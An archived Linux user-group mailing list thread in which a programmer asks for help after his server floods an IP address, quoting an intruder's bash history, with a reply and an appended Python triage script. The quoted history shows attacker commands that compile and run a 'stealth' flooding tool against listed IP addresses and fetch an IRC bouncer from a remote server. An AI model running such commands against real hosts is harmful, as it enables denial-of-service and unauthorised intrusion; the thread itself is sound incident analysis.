Joel A. Matz on Fri, 30 Jun 2000 06:38:44 -0400 (EDT)
I did a little searching, that doesn't look good. I found two stealth.c
programs, one looks like it removes entries from utmp so as to hide the
thug, the other appears to do some bad stuff with your pgp key ring.

Joel

Michael Whitman wrote:
>
> My email server went crazy last night, according to my isp, sending
> something like 3000 packets every 2 seconds to ip address
> 216.87.212.162. Doing a grep on that address I got this response
> /home/squ/.bash_history:./stealth 216.87.212.162 7
>
> Here is the content of that file... looks like bnc (an IRC program I
> think) was installed - what is stealth?
>
> Looks like I was hacked? Any help with interpreting what went on would be
> appreciated.
>
> w
> w
> w
> ftp
> l
> w
> ls
> ftp
> gcc -o stealth stealth.c
> ./stealth 207.202.129.211 1234
> ./stealth 206.161.205.30 225
> ls
> ./stealth 207.179.81.70 6668
> ls
> ./stealth 204.156.12.50 6667
> ./stealth 192.114.47.10 6667
> ls
> ./stealth 213.9.19.30 6668
> ./stealth 204.126.2.47 1
> ./stealth 216.123.178.4 1
> ls
> w
> lynx http://ftp.loxinfo.co.th/pub/unix/irc/bnc2.6.2.tar.gz
> ls
> gunzip bnc2.6.2.tar.gz
> tar -vxf bnc2.6.2.tar
> cd bnc2.6.2
> make
> pico example.conf
> ./bnc example.conf
> ls
> ./stealth 216.87.212.162 7
>
> -Mike
>
> Michael P. Whitman
> Programmer
> LAW.com
>
> mailto:michaelw@palawnet.com
>
> ______________________________________________________________________
> Philadelphia Linux Users Group - http://plug.nothinbut.net
> Announcements - http://lists.nothinbut.net/mail/listinfo/plug-announce
> General Discussion - http://lists.nothinbut.net/mail/listinfo/plug
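One way to triage a shell history like the one quoted above, added here as an example and not part of the original thread: it sorts each line into builds, transfers and binaries run from the working directory, and counts the address/port pairs handed to those binaries. The function names and the two tool lists are assumptions; the sample is an abridged copy of the quoted history.

```python
import ipaddress
import shlex
from collections import Counter

# Abridged copy of the history quoted in the post above.
SAMPLE_HISTORY = """\
w
ftp
gcc -o stealth stealth.c
./stealth 207.202.129.211 1234
./stealth 204.156.12.50 6667
lynx http://ftp.loxinfo.co.th/pub/unix/irc/bnc2.6.2.tar.gz
make
./bnc example.conf
./stealth 216.87.212.162 7
"""

# Assumed category lists; extend them for the tools present on the host.
BUILD_TOOLS = {"gcc", "cc", "g++", "make"}
TRANSFER_TOOLS = {"ftp", "ncftp", "lynx", "wget", "curl", "scp"}

def ipv4(arg):
    """Return arg as a normalised IPv4 string, or None if it is not one."""
    try:
        return str(ipaddress.IPv4Address(arg))
    except ValueError:
        return None

def triage(history):
    """Sort history lines into builds, transfers and locally run binaries."""
    report = {"builds": [], "transfers": [], "local_runs": [], "targets": Counter()}
    for lineno, line in enumerate(history.splitlines(), 1):
        try:
            argv = shlex.split(line)
        except ValueError:  # unbalanced quotes: fall back to plain splitting
            argv = line.split()
        if not argv:
            continue
        if argv[0] in BUILD_TOOLS:
            report["builds"].append((lineno, line))
        elif argv[0] in TRANSFER_TOOLS:
            report["transfers"].append((lineno, line))
        elif argv[0].startswith("./"):
            report["local_runs"].append((lineno, line))
            # Count each "IP port" argument pair passed to the local binary.
            for addr, port in zip(argv[1:], argv[2:] + [""]):
                if ipv4(addr):
                    report["targets"][(ipv4(addr), int(port) if port.isdigit() else None)] += 1
    return report
```

Shell history carries no timestamps by default and is writable by the account that owns it, so the result is a lead to check against other logs, not a complete record.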